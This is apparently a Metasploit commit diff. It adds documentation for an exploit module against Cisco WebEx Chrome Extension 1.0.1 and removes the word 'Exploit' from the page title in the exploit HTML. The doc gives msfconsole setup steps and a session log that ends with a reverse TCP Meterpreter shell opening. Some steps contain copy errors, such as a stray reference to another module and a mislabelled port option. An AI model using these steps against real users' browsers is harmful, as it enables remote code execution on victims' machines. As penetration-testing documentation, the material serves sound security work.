add module doc and remove the word EXPLOIT from document title
parent
d87cb4b085
commit
94f9971300
|
@ -0,0 +1,55 @@
|
|||
Cisco WebEx is a suite of applications for online meeting organization and video conferencing.
|
||||
Included in this suite are extensions for popular web browsers which ease use and provide supplemental
|
||||
features.
|
||||
|
||||
Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an
|
||||
attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Cisco WebEx Chrome Extension 1.0.1 is known to be affected.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
**Using cisco_webex_ext**
|
||||
|
||||
After the encrypted communication is enabled, you are ready to use
|
||||
hp_dataprotector_encrypted_comms. Here is what you do:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/windows/misc/cisco_webex_ext```
|
||||
3. Do: ```set SRVHOST [IP ADDRESS]```
|
||||
4. Do: ```set SRVPORT [PAYLOAD NAME]```
|
||||
5. Do: ```set URIPATH [ARBITRARY URI]```
|
||||
6. Do: ```Choose a payload and set any specific options```
|
||||
6. Do: ```run```, after a target browses to the generated URL, you should receive a session like the following:
|
||||
|
||||
```
|
||||
msf > use exploits/windows/misc/cisco_webex_ext
|
||||
msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151
|
||||
srvhost => 10.6.0.151
|
||||
msf exploit(cisco_webex_ext) > set srvport 4567
|
||||
srvport => 4567
|
||||
msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting
|
||||
uripath => not_a_very_good_meeting
|
||||
msf exploit(cisco_webex_ext) > run
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 10.6.255.229:4444
|
||||
[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting
|
||||
[*] Server started.
|
||||
msf exploit(cisco_webex_ext) > [*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting
|
||||
[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
|
||||
[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html
|
||||
[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
|
||||
[*] 10.6.0.151 cisco_webex_ext - Sending exploit html ...
|
||||
[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N
|
||||
[*] 10.6.0.151 cisco_webex_ext - From:
|
||||
[*] 10.6.0.151 cisco_webex_ext - Sending payload ...
|
||||
[*] Sending stage (957487 bytes) to 10.6.255.229
|
||||
[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600
|
||||
|
||||
msf exploit(cisco_webex_ext) >
|
||||
```
|
||||
|
|
@ -59,7 +59,6 @@ def exploit_html(cli, req_uri)
|
|||
html = %Q~
|
||||
<html>
|
||||
<head>
|
||||
<title>Cisco WebEx Exploit</title>
|
||||
<script>
|
||||
var msg = {
|
||||
GpcProductRoot: "WebEx",
|
||||
|
|
Loading…
Reference in New Issue